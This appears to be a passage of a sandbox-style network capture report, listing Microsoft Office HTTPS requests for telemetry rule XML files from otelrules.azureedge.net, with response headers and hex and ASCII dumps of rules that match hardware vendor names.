                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      6192.168.2.64971113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:14 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 3788
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                                                      x-ms-request-id: f909c6c7-c01e-0049-518c-3aac27000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095414Z-r1d97b9957789nh9hC1TEBxha800000008vg00000000535f
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      7192.168.2.64971813.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:14 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 471
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                                                                                                      x-ms-request-id: e563634e-601e-000d-3bed-3a2618000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095414Z-185f5d8b95cjbkr4hC1NYCeu2400000009wg000000009chz
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      8192.168.2.64971913.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:14 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 632
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 70a275ef-201e-0051-048c-3a7340000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095414Z-185f5d8b95c4hl5whC1NYCeex000000009z0000000008frq
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      9192.168.2.64971613.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:14 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 474
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 3126d9de-f01e-0099-4d8c-3a9171000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095414Z-r1d97b99577jlrkbhC1TEBq8d000000008h000000000arwt
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      10192.168.2.64972013.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:14 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 467
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 7f65a9a1-801e-0067-788c-3afe30000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095414Z-185f5d8b95cf7qddhC1NYC66an0000000a3g000000009r0p
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      11192.168.2.64971713.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:14 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                                                                                                      x-ms-request-id: bfe6cc7a-201e-006e-7e8c-3abbe3000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095414Z-r1d97b995777mdbwhC1TEBezag00000008ng000000009tf3
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      12192.168.2.64972113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:15 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:15 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 79148a84-101e-0017-578c-3a47c7000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095415Z-185f5d8b95csp6jmhC1NYCwy6s0000000a40000000000k4s
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:15 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      13192.168.2.64972413.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:15 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:15 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                                      x-ms-request-id: b82db720-b01e-0053-528c-3acdf8000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095415Z-185f5d8b95csp6jmhC1NYCwy6s0000000a30000000002cpz
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:15 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      14192.168.2.64972513.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:15 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:15 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:15 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                                      x-ms-request-id: a1d80e42-301e-0096-338c-3ae71d000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
